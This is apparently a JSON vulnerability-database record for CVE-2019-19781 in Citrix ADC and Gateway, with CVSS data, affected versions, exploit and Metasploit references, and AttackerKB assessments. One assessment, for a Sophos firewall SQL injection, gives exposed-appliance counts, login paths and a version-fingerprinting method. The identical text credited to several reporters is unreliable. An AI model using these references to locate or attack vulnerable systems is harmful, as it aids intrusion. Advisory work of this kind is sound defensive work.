{"id": "CVE-2019-19781", "bulletinFamily": "NVD", "title": "CVE-2019-19781", "description": "An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.", "published": "2019-12-27T14:15:00", "modified": "2020-01-08T19:15:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-19781", "reporter": "cve@mitre.org", "references": ["https://forms.gle/eDf3DXZAv96oosfj6", "http://packetstormsecurity.com/files/155930/Citrix-Application-Delivery-Controller-Gateway-10.5-Remote-Code-Execution.html", "http://packetstormsecurity.com/files/155947/Citrix-ADC-NetScaler-Directory-Traversal-Remote-Code-Execution.html", "http://packetstormsecurity.com/files/155904/Citrix-Application-Delivery-Controller-Gateway-Remote-Code-Execution.html", "https://badpackets.net/over-25000-citrix-netscaler-endpoints-vulnerable-to-cve-2019-19781/", "http://packetstormsecurity.com/files/155905/Citrix-Application-Delivery-Controller-Gateway-Remote-Code-Execution-Traversal.html", "https://www.kb.cert.org/vuls/id/619785", "https://twitter.com/bad_packets/status/1215431625766424576", "https://support.citrix.com/article/CTX267027", "http://packetstormsecurity.com/files/155972/Citrix-ADC-Gateway-Path-Traversal.html"], "cvelist": ["CVE-2019-19781"], "type": "cve", "lastseen": "2021-04-23T00:45:21", "edition": 11, "viewCount": 422, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:75221F03-CFA1-478E-9777-568E523E3272", "AKB:AFC76977-D355-470D-A7F6-FEF7A8352B65"]}, {"type": "symantec", "idList": ["SMNTC-111238"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0", "QUALYSBLOG:82E24C28622F0C96140EDD88C6BD8F54", "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E"]}, {"type": "cisa", "idList": ["CISA:8AA4B67E8B2150628DAEB8C3A98C4BEC", "CISA:E46D6B22DC3B3F8B062C07BD8EA4CB7C", "CISA:661993843C9F9A838ADA8B8B8B9412D1", "CISA:134C272F26FB005321448C648224EB02"]}, {"type": "citrix", "idList": ["CTX267027"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:155972", "PACKETSTORM:155905", "PACKETSTORM:155930", "PACKETSTORM:155904", "PACKETSTORM:155947"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/CITRIX_DIR_TRAVERSAL/", "MSF:AUXILIARY/SCANNER/HTTP/CITRIX_DIR_TRAVERSAL", "MSF:EXPLOIT/LINUX/HTTP/CITRIX_DIR_TRAVERSAL_RCE"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:213FB88DED3CCAB77D32289A335E386D", "EXPLOITPACK:04BD77915CB7D5152AF289164D21448A", "EXPLOITPACK:D0A0C692882848C218FDF1B93258E171", "EXPLOITPACK:959CB519C011AA90D2BEE4ED33D8FEBF"]}, {"type": "ptsecurity", "idList": ["PT-2020-01"]}, {"type": "zdt", "idList": ["1337DAY-ID-33794", "1337DAY-ID-33824", "1337DAY-ID-33806"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:80B21E934B1C43C7071F039FE9512208", "MALWAREBYTES:D7EFF87E8AB1DBEC63A0DBE7F8DA90B8"]}, {"type": "canvas", "idList": ["NETSCALER_TRAVERSAL_RCE"]}, {"type": "fireeye", "idList": ["FIREEYE:173497473E4F8289490BBFFF8E828EC9", "FIREEYE:BFB36D22F20651C632D25AA20588E904", "FIREEYE:27339B4646A838356BA1378430516613", "FIREEYE:E126D2B5A643EE6CD5B128CAC8C217CF", "FIREEYE:2FBC6EAA2BC98E48BDE41A39FB730AA1"]}, {"type": "thn", "idList": ["THN:0E6CD47141AAF54903BD6C1F9BD96F44", "THN:87AE96960D76D6C84D9CF86C2DDB837C", "THN:DABC62CDC9B66962217D9A8ABA9DF060", "THN:91A2A296EF8B6FD5CD8B904690E810E8", "THN:461B7AEC7D12A32B4ED085F0EA213502", "THN:166AAAF7F04EF01C9E049500387BD1FD", "THN:9994A9D5CFB76851BB74C8AD52F3DBBE", "THN:1ED1BB1B7B192353E154FB0B02F314F4", "THN:6ED39786EE29904C7E93F7A0E35A39CB", "THN:EB3F9784BB2A52721953F128D1B3EAEC"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:6A1F743B64899419F505BFE243BD179F", "RAPID7BLOG:C90DF07E98E436DFBFCC5BA576D21019"]}, {"type": "nessus", "idList": ["CITRIX_NETSCALER_CTX267027.NASL", "FREEBSD_PKG_2BAB995F36D411EA9DAD002590ACAE31.NASL"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:4124E2CCDA610C6D222319C47C8D3250", "IMPERVABLOG:BB987E93C1A58280077D98CF497FD72D"]}, {"type": "talosblog", "idList": ["TALOSBLOG:C73CDA82B845335B5DCC8A94FB5662D8", "TALOSBLOG:D7662F18F14544FB63C58CB527CC3A4A", "TALOSBLOG:7192A351B37E9A67C1A5DB760A14DA7E"]}, {"type": "freebsd", "idList": ["2BAB995F-36D4-11EA-9DAD-002590ACAE31"]}, {"type": "exploitdb", "idList": ["EDB-ID:47930", "EDB-ID:47901"]}, {"type": "cert", "idList": ["VU:619785"]}, {"type": "krebs", "idList": ["KREBS:62E2D32C0ABD1C4B8EA91C60B425255B"]}, {"type": "threatpost", "idList": ["THREATPOST:FADCF664C06E3747C40C200AE681FDF8", "THREATPOST:B956AABD7A9591A8F25851E15000B618", "THREATPOST:AD4EF56E5440159F6E37D8B403C253D7", "THREATPOST:63D2355B6EF0B975846E034876BC66DF", "THREATPOST:93F1D3DD89A41A41475737BF84F8146C", "THREATPOST:99610F4016AECF953EEE643779490F30", "THREATPOST:B53DDA5AD9C6530F631391E064A0D4FA", "THREATPOST:48D622E76FCC26F28B32364668BB1930", "THREATPOST:9688E067E5F287042D4EBC46107C66AF", "THREATPOST:AB2F6BF7F6EC16383E737E091BA9385B"]}, {"type": "securelist", "idList": ["SECURELIST:35644FF079836082B5B728F8E95F0EDD"]}, {"type": "mssecure", "idList": ["MSSECURE:E3C8B97294453D962741782EC959E79C"]}], "modified": "2021-04-23T00:45:21", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:75221F03-CFA1-478E-9777-568E523E3272", "AKB:AFC76977-D355-470D-A7F6-FEF7A8352B65"]}, {"type": "cisa", "idList": ["CISA:8AA4B67E8B2150628DAEB8C3A98C4BEC"]}], "modified": "2021-04-23T00:45:21"}, "score": {"value": 5.4, "vector": "NONE", "modified": "2021-04-23T00:45:21", "rev": 2}, "twitter": {"counter": 57, "tweets": [{"link": "https://twitter.com/ciberseguridadx/status/1384714894042443776", "text": "La NSA recomienda mitigar con urgencia estas vulnerabilidades, que est\u00e1n siendo explotadas por la SVR Rusa y otros actores de amenazas. CVE-2018-13379 targets Fortinet FortiOS, CVE-2019-19781 targets Citrix ADC and Gateway \nhttps://t.co/I93wg9cNoF?amp=1"}, {"link": "https://twitter.com/malr1na/status/1383574942092906497", "text": "CVE-2018-13379:\u00a0Fortinet FortiGate VPN\nCVE-2019-9670:\u00a0Synacor Zimbra Collaboration Suite\nCVE-2019-11510:\u00a0Pulse Secure Pulse Connect Secure VPN\nCVE-2019-19781:\u00a0Citrix Application Delivery Controller and Gateway\nCVE-2020-4006:\u00a0VMware Workspace ONE Access"}, {"link": "https://twitter.com/xrpcrypticdad/status/1382896091084025859", "text": "CVE-2018-13379 Fortinet FortiGate VPN\n\nCVE-2019-9670 Synacor Zimbra Collaboration Suite\n\nCVE-2019-11510 Pulse Secure Pulse Connect Secure VPN\n\nCVE-2019-19781 Citrix Application Delivery Controller and Gateway\n\nCVE-2020-4006 VMware Workspace ONE Access"}, {"link": "https://twitter.com/ul_shino/status/1386201843970183170", "text": "CVE-2018-13379 Fortinet FortiGate VPN\nCVE-2019-9670 Synacor Zimbra Collaboration Suite\nCVE-2019-11510 Pulse Secure Pulse Connect Secure VPN\nCVE-2019-19781 Citrix Application Delivery Controller and Gateway \nCVE-2020-4006 VMware Workspace ONE Access"}, {"link": "https://twitter.com/Gardenia_pwmb/status/1386199150522372097", "text": "CVE-2018-13379 Fortinet FortiGate VPN\nCVE-2019-9670 Synacor Zimbra Collaboration Suite\nCVE-2019-11510 Pulse Secure Pulse Connect Secure VPN\nCVE-2019-19781 Citrix Application Delivery Controller and Gateway \nCVE-2020-4006 VMware Workspace ONE Access"}, {"link": "https://twitter.com/Har_sia/status/1386203714625572866", "text": "CVE-2018-13379\nCVE-2019-9670\nCVE-2019-11510\nCVE-2019-19781\nCVE-2020-4006"}, {"link": "https://twitter.com/elhackernet/status/1387486272348885001", "text": "6 grupos /hashtag/ransomware?src=hashtag_click responsables del 80% v\u00edctimas\n \u2013 Maze, Conti, Egregor, DoppelPaymer, NetWalker y REvil \nVectores de entrada:\n- CVE-2019-19781 (Citrix)\n- CVE-2019-11510 (Pulse Secure VPN)\nFuente:\nhttps://t.co/2CYCxNbTao?amp=1"}, {"link": "https://twitter.com/ThomasPreischl/status/1389168538477281282", "text": "From the archive | CVE-2019-19781 \u2013 Citrix ADC / Netscaler and"}, {"link": "https://twitter.com/CswWorks/status/1389822359348068352", "text": "Last year CSW analyzed 44 and 25 vulnerabilities in Pulse Secure and Citrix respectively. We red-flagged CVE-2019-11510 and CVE-2019-19781 attack vectors that might be used by attackers to compromise corporate networks\nRead more - https://t.co/bD4XUfl22k?amp=1\n/hashtag/Ransomware?src=hashtag_click /hashtag/APTGroups?src=hashtag_click"}, {"link": "https://twitter.com/ZDayhacking/status/1391078287493853185", "text": "On 2020 /covid-19, /hashtag/CVE?src=hashtag_click-2019-19781[/hashtag/CVSS?src=hashtag_click score: 9.8] major security flaw found in Critix Application Delivery Controller(ADC) and Gateway. They allow directory Traversal, to steal the Healthcare details about patients."}], "modified": "2021-04-23T00:45:21"}, "vulnersScore": 5.4}, "cpe": ["cpe:/o:citrix:application_delivery_controller_firmware:12.0", "cpe:/o:citrix:application_delivery_controller_firmware:12.1", "cpe:/o:citrix:netscaler_gateway_firmware:12.1", "cpe:/o:citrix:gateway_firmware:13.0", "cpe:/o:citrix:netscaler_gateway_firmware:11.1", "cpe:/o:citrix:application_delivery_controller_firmware:13.0", "cpe:/o:citrix:application_delivery_controller_firmware:11.1", "cpe:/o:citrix:application_delivery_controller_firmware:10.5", "cpe:/o:citrix:netscaler_gateway_firmware:12.0", "cpe:/o:citrix:netscaler_gateway_firmware:10.5"], "affectedSoftware": [{"cpeName": "citrix:application_delivery_controller_firmware", "name": "citrix application delivery controller firmware", "operator": "eq", "version": "10.5"}, {"cpeName": "citrix:application_delivery_controller_firmware", "name": "citrix application delivery controller firmware", "operator": "eq", "version": "12.0"}, {"cpeName": "citrix:netscaler_gateway_firmware", "name": "citrix netscaler gateway firmware", "operator": "eq", "version": "10.5"}, {"cpeName": "citrix:netscaler_gateway_firmware", "name": "citrix netscaler gateway firmware", "operator": "eq", "version": "12.1"}, {"cpeName": "citrix:application_delivery_controller_firmware", "name": "citrix application delivery controller firmware", "operator": "eq", "version": "13.0"}, {"cpeName": "citrix:netscaler_gateway_firmware", "name": "citrix netscaler gateway firmware", "operator": "eq", "version": "11.1"}, {"cpeName": "citrix:netscaler_gateway_firmware", "name": "citrix netscaler gateway firmware", "operator": "eq", "version": "12.0"}, {"cpeName": "citrix:application_delivery_controller_firmware", "name": "citrix application delivery controller firmware", "operator": "eq", "version": "11.1"}, {"cpeName": "citrix:application_delivery_controller_firmware", "name": "citrix application delivery controller firmware", "operator": "eq", "version": "12.1"}, {"cpeName": "citrix:gateway_firmware", "name": "citrix gateway firmware", "operator": "eq", "version": "13.0"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cpe23": ["cpe:2.3:o:citrix:netscaler_gateway_firmware:12.1:*:*:*:*:*:*:*", "cpe:2.3:o:citrix:netscaler_gateway_firmware:10.5:*:*:*:*:*:*:*", "cpe:2.3:o:citrix:netscaler_gateway_firmware:12.0:*:*:*:*:*:*:*", "cpe:2.3:o:citrix:application_delivery_controller_firmware:13.0:*:*:*:*:*:*:*", "cpe:2.3:o:citrix:netscaler_gateway_firmware:11.1:*:*:*:*:*:*:*", "cpe:2.3:o:citrix:application_delivery_controller_firmware:10.5:*:*:*:*:*:*:*", "cpe:2.3:o:citrix:application_delivery_controller_firmware:11.1:*:*:*:*:*:*:*", "cpe:2.3:o:citrix:application_delivery_controller_firmware:12.1:*:*:*:*:*:*:*", "cpe:2.3:o:citrix:gateway_firmware:13.0:*:*:*:*:*:*:*", "cpe:2.3:o:citrix:application_delivery_controller_firmware:12.0:*:*:*:*:*:*:*"], "cwe": ["CWE-22"], "scheme": null, "affectedConfiguration": [{"cpeName": "citrix:netscaler_gateway", "name": "citrix netscaler gateway", "operator": "eq", "version": "-"}, {"cpeName": "citrix:application_delivery_controller", "name": "citrix application delivery controller", "operator": "eq", "version": "-"}, {"cpeName": "citrix:gateway", "name": "citrix gateway", "operator": "eq", "version": "-"}], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:o:citrix:application_delivery_controller_firmware:12.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:citrix:application_delivery_controller_firmware:10.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:citrix:application_delivery_controller_firmware:11.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:citrix:application_delivery_controller_firmware:13.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:citrix:application_delivery_controller_firmware:12.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}, {"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:h:citrix:application_delivery_controller:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}], "operator": "OR"}], "cpe_match": [], "operator": "AND"}, {"children": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:o:citrix:netscaler_gateway_firmware:12.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:citrix:netscaler_gateway_firmware:11.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:citrix:netscaler_gateway_firmware:12.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:citrix:netscaler_gateway_firmware:10.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}, {"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:h:citrix:netscaler_gateway:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}], "operator": "OR"}], "cpe_match": [], "operator": "AND"}, {"children": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:o:citrix:gateway_firmware:13.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}, {"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:h:citrix:gateway:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}], "operator": "OR"}], "cpe_match": [], "operator": "AND"}]}, "extraReferences": [{"name": "https://twitter.com/bad_packets/status/1215431625766424576", "refsource": "MISC", "tags": [], "url": "https://twitter.com/bad_packets/status/1215431625766424576"}, {"name": "https://support.citrix.com/article/CTX267027", "refsource": "CONFIRM", "tags": ["Vendor Advisory"], "url": "https://support.citrix.com/article/CTX267027"}, {"name": "http://packetstormsecurity.com/files/155930/Citrix-Application-Delivery-Controller-Gateway-10.5-Remote-Code-Execution.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/155930/Citrix-Application-Delivery-Controller-Gateway-10.5-Remote-Code-Execution.html"}, {"name": "http://packetstormsecurity.com/files/155904/Citrix-Application-Delivery-Controller-Gateway-Remote-Code-Execution.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/155904/Citrix-Application-Delivery-Controller-Gateway-Remote-Code-Execution.html"}, {"name": "http://packetstormsecurity.com/files/155947/Citrix-ADC-NetScaler-Directory-Traversal-Remote-Code-Execution.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/155947/Citrix-ADC-NetScaler-Directory-Traversal-Remote-Code-Execution.html"}, {"name": "VU#619785", "refsource": "CERT-VN", "tags": [], "url": "https://www.kb.cert.org/vuls/id/619785"}, {"name": "https://forms.gle/eDf3DXZAv96oosfj6", "refsource": "MISC", "tags": [], "url": "https://forms.gle/eDf3DXZAv96oosfj6"}, {"name": "https://badpackets.net/over-25000-citrix-netscaler-endpoints-vulnerable-to-cve-2019-19781/", "refsource": "MISC", "tags": [], "url": "https://badpackets.net/over-25000-citrix-netscaler-endpoints-vulnerable-to-cve-2019-19781/"}, {"name": "http://packetstormsecurity.com/files/155905/Citrix-Application-Delivery-Controller-Gateway-Remote-Code-Execution-Traversal.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/155905/Citrix-Application-Delivery-Controller-Gateway-Remote-Code-Execution-Traversal.html"}, {"name": "http://packetstormsecurity.com/files/155972/Citrix-ADC-Gateway-Path-Traversal.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/155972/Citrix-ADC-Gateway-Path-Traversal.html"}], "immutableFields": []}

{"attackerkb": [{"lastseen": "2021-05-06T15:18:52", "bulletinFamily": "info", "cvelist": ["CVE-2019-19781"], "description": "An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.\n\n \n**Recent assessments:** \n \n**kevthehermit** at February 22, 2020 12:29am UTC reported:\n\nAWS had pre built AMIs for these appliances built and supplied to the market place by Citrix.\n\nAt the time of release and for several weeks afterwards, they were still available in their default vulnerable state. Whilst AWS have removed the vulnerable images any AWS account that subscribed to a specific AMI will still have the default vulnerable version.\n\nIf you use this kind of setup it is important to remove any old AMIs and replace them, do not assume that patches will be applied to exising AMIs\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5**zeroSteiner** at January 02, 2020 3:42pm UTC reported:\n\nAWS had pre built AMIs for these appliances built and supplied to the market place by Citrix.\n\nAt the time of release and for several weeks afterwards, they were still available in their default vulnerable state. Whilst AWS have removed the vulnerable images any AWS account that subscribed to a specific AMI will still have the default vulnerable version.\n\nIf you use this kind of setup it is important to remove any old AMIs and replace them, do not assume that patches will be applied to exising AMIs\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 5**dmelcher5151** at April 16, 2020 12:56am UTC reported:\n\nAWS had pre built AMIs for these appliances built and supplied to the market place by Citrix.\n\nAt the time of release and for several weeks afterwards, they were still available in their default vulnerable state. Whilst AWS have removed the vulnerable images any AWS account that subscribed to a specific AMI will still have the default vulnerable version.\n\nIf you use this kind of setup it is important to remove any old AMIs and replace them, do not assume that patches will be applied to exising AMIs\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5**bcook-r7** at January 11, 2020 7:23pm UTC reported:\n\nAWS had pre built AMIs for these appliances built and supplied to the market place by Citrix.\n\nAt the time of release and for several weeks afterwards, they were still available in their default vulnerable state. Whilst AWS have removed the vulnerable images any AWS account that subscribed to a specific AMI will still have the default vulnerable version.\n\nIf you use this kind of setup it is important to remove any old AMIs and replace them, do not assume that patches will be applied to exising AMIs\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5**hrbrmstr** at May 12, 2020 7:56pm UTC reported:\n\nAWS had pre built AMIs for these appliances built and supplied to the market place by Citrix.\n\nAt the time of release and for several weeks afterwards, they were still available in their default vulnerable state. Whilst AWS have removed the vulnerable images any AWS account that subscribed to a specific AMI will still have the default vulnerable version.\n\nIf you use this kind of setup it is important to remove any old AMIs and replace them, do not assume that patches will be applied to exising AMIs\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5**gwillcox-r7** at October 20, 2020 5:51pm UTC reported:\n\nAWS had pre built AMIs for these appliances built and supplied to the market place by Citrix.\n\nAt the time of release and for several weeks afterwards, they were still available in their default vulnerable state. Whilst AWS have removed the vulnerable images any AWS account that subscribed to a specific AMI will still have the default vulnerable version.\n\nIf you use this kind of setup it is important to remove any old AMIs and replace them, do not assume that patches will be applied to exising AMIs\n", "modified": "2020-07-30T00:00:00", "id": "AKB:AFC76977-D355-470D-A7F6-FEF7A8352B65", "href": "https://attackerkb.com/topics/x22buZozYJ/cve-2019-19781", "published": "2019-11-05T00:00:00", "type": "attackerkb", "title": "CVE-2019-19781", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-05-08T15:17:21", "bulletinFamily": "info", "cvelist": ["CVE-2019-19781", "CVE-2020-12271"], "description": "A SQL injection issue was found in SFOS 17.0, 17.1, 17.5, and 18.0 before 2020-04-25 on Sophos XG Firewall devices, as exploited in the wild in April 2020. This affected devices configured with either the administration (HTTPS) service or the User Portal exposed on the WAN zone. A successful attack may have caused remote code execution that exfiltrated usernames and hashed passwords for the local device admin(s), portal admins, and user accounts used for remote access (but not external Active Directory or LDAP passwords)\n\n \n**Recent assessments:** \n \n**hrbrmstr** at April 27, 2020 12:34pm UTC reported:\n\n### Vulnerability Rating/Info\n\nI based the value and exploitability off of the Sophos vulnerability details page: <https://community.sophos.com/kb/en-us/135412> / <https://web.archive.org/web/20200426003614/https://community.sophos.com/kb/en-us/135412>\n\nSophos indicates attackers have been actively compromising these appliances at least as of April 22, 2020 when at least one customer noticed odd field values in their admin console.\n\nGiven that the SQL injection can happen pre-auth, and that both the user-facing and admin-facing interfaces are vulnerable, means this is a pretty severe bug.\n\nIt appears to only provide access to usernames and hashed appliance passwords. Credential reuse is likely the culprit for at least the known successful post-SQLi compromise.\n\n### Exposure Analysis\n\nWe found over 72,000 exposed appliances. Many appear to be service provider/telecom/ISP provisioned and sitting on customer segments.\n\nThe top 20 countries (IP geolocation) make up ~80% of the exposure:\n\ncountry | n | pct \n---|---|--- \nUnited States | 9126 | 12.54% \nIndia | 7989 | 10.98% \nGermany | 5433 | 7.47% \nJapan | 4680 | 6.43% \nItaly | 4338 | 5.96% \nAustralia | 4168 | 5.73% \nTurkey | 3740 | 5.14% \nBrazil | 3526 | 4.85% \nFrance | 2567 | 3.53% \nUnited Kingdom | 1822 | 2.50% \nSouth Africa | 1779 | 2.44% \nCanada | 1658 | 2.28% \nSpain | 1644 | 2.26% \nMalaysia | 1496 | 2.06% \nSwitzerland | 1261 | 1.73% \nColombia | 1124 | 1.54% \nThailand | 1087 | 1.49% \nNetherlands | 932 | 1.28% \nTaiwan | 681 | 0.94% \nPortugal | 611 | 0.84% \n \nThere are 2 primary externally facing HTTP paths:\n\n * Admin @ `https://{host|ip}:{port}/webconsole/webpages/login.jsp` \n\n * User @ `https://{host|ip}:{port}/userportal/webpages/myaccount/login.jsp` \n\n\nI crafted a quick hack study to just see if we could get version info and we can. Sophos does the daft thing Microsoft does for OWA and refers to HTML resources by the version/build (e.g.):\n \n \n <link rel=\"stylesheet\"\n href=\"/themes/lite1/css/loginstylesheet.css?ver=17.5.9.577\"\n type=\"text/css\">\n \n\nI\u2019ll be doing a more thorough path study this week but we got back ~12,500 unique (by IP) responses. Here\u2019s the breakdown (TLDR there\u2019s a decent bit of exposure as of Sunday).\n \n \n Sophos XG Appliance Version Distribution \n ~65,000 Appliances Provided Version Details; \n Only ~25% appear to be patched as of 2020-04-27. \n \n # Sophos Appliances \n 0~ 5,000 10,000 15,000\n 5.01.0.376 x ~ ~ ~ \n 5.01.0.407 x ~ ~ ~ \n 5.01.0.418 x ~ ~ ~ \n 5.01.0.447 x ~ ~ ~ \n 6.01.0.190 x ~ ~ ~ \n 6.01.1.202 xx ~ ~ ~ \n 6.01.2.222 x ~ ~ ~ \n 6.01.3.265 x ~ ~ ~ \n 6.01.4.342 x ~ ~ ~ \n 6.05.0.098 x ~ ~ ~ \n 6.05.0.117 x ~ ~ ~ \n 6.05.1.139 x ~ ~ ~ \n 6.05.2.160 xx ~ ~ ~ \n 6.05.3.183 x ~ ~ ~ \n 6.05.5.233 xx ~ ~ ~ \n 6.05.6.266 xx ~ ~ ~ \n 6.05.7.305 xx ~ ~ ~ \n 6.05.8.320 x ~ ~ ~ \n 17.0.0.32 x ~ ~ ~ \n 17.0.0.80 x ~ ~ ~ \n 17.0.1.98 x ~ ~ ~ \n 17.0.2.116 xx ~ ~ ~ \n 17.0.3.131 x ~ ~ ~ \n 17.0.5.162 xx ~ ~ ~ \n 17.0.6.181 xxxxx ~ ~ ~ \n 17.0.7.191 xxxx ~ ~ ~ \n 17.0.8.209 x ~ ~ ~ \n 17.0.9.217 x ~ ~ ~ \n 17.1.0.152 x ~ ~ ~ \n 17.1.1.175 xx ~ ~ ~ \n 17.1.2.225 xxxx ~ ~ ~ \n 17.1.3.250 xxxxx ~ ~ ~ \n 17.5.0.310 x ~ ~ ~ \n 17.5.0.321 xxx ~ ~ ~ \n 17.5.1.347 xxx ~ ~ ~ \n 17.5.2.381 xxxxxxxxxxxxxxxxxxxxxxxxxx ~ ~ \n 17.5.3.372 x ~ ~ ~ \n 17.5.4.429 xxxxxx ~ ~ ~ \n 17.5.5.433 xxxxxxxxx ~ ~ ~ \n 17.5.6.488 xxxxxx ~ ~ ~ \n 17.5.7.511 xxxxxxxxxxxxxxxxxxxxxxxxx ~ ~ \n 17.5.8.539 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ~ \n 7.5.10.620 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ~ \n 7.5.11.661 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ~ \n 18.0.0.102 x ~ ~ ~ \n 18.0.0.113 x ~ ~ ~ \n 18.0.0.180 x ~ ~ ~ \n 18.0.0.285 x ~ ~ ~ \n 18.0.0.321 xx ~ ~ ~ \n 18.0.0.339 xxxxxx ~ ~ ~ \n 18.0.0.354 xx ~ ~ ~ \n 18.0.1.368 x ~ ~ ~ \n ~ Source: Rapid7 Project Sonar April 2020 HTTPS Studies~ \n \n\nAs of 2020-04-28 ~25% appliances do not leave the \u201cauto-update hotfix\u201d setting on.\n\nOur blog on it: <https://blog.rapid7.com/2020/04/27/cve-2020-12271-sophos-xg-firewall-pre-auth-sql-injection-vulnerability-remediation-guidance-and-exposure-overview/> | <https://web.archive.org/web/20200428094002/https://blog.rapid7.com/2020/04/27/cve-2020-12271-sophos-xg-firewall-pre-auth-sql-injection-vulnerability-remediation-guidance-and-exposure-overview/>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5**busterb** at April 29, 2020 1:24pm UTC reported:\n\n### Vulnerability Rating/Info\n\nI based the value and exploitability off of the Sophos vulnerability details page: <https://community.sophos.com/kb/en-us/135412> / <https://web.archive.org/web/20200426003614/https://community.sophos.com/kb/en-us/135412>\n\nSophos indicates attackers have been actively compromising these appliances at least as of April 22, 2020 when at least one customer noticed odd field values in their admin console.\n\nGiven that the SQL injection can happen pre-auth, and that both the user-facing and admin-facing interfaces are vulnerable, means this is a pretty severe bug.\n\nIt appears to only provide access to usernames and hashed appliance passwords. Credential reuse is likely the culprit for at least the known successful post-SQLi compromise.\n\n### Exposure Analysis\n\nWe found over 72,000 exposed appliances. Many appear to be service provider/telecom/ISP provisioned and sitting on customer segments.\n\nThe top 20 countries (IP geolocation) make up ~80% of the exposure:\n\ncountry | n | pct \n---|---|--- \nUnited States | 9126 | 12.54% \nIndia | 7989 | 10.98% \nGermany | 5433 | 7.47% \nJapan | 4680 | 6.43% \nItaly | 4338 | 5.96% \nAustralia | 4168 | 5.73% \nTurkey | 3740 | 5.14% \nBrazil | 3526 | 4.85% \nFrance | 2567 | 3.53% \nUnited Kingdom | 1822 | 2.50% \nSouth Africa | 1779 | 2.44% \nCanada | 1658 | 2.28% \nSpain | 1644 | 2.26% \nMalaysia | 1496 | 2.06% \nSwitzerland | 1261 | 1.73% \nColombia | 1124 | 1.54% \nThailand | 1087 | 1.49% \nNetherlands | 932 | 1.28% \nTaiwan | 681 | 0.94% \nPortugal | 611 | 0.84% \n \nThere are 2 primary externally facing HTTP paths:\n\n * Admin @ `https://{host|ip}:{port}/webconsole/webpages/login.jsp` \n\n * User @ `https://{host|ip}:{port}/userportal/webpages/myaccount/login.jsp` \n\n\nI crafted a quick hack study to just see if we could get version info and 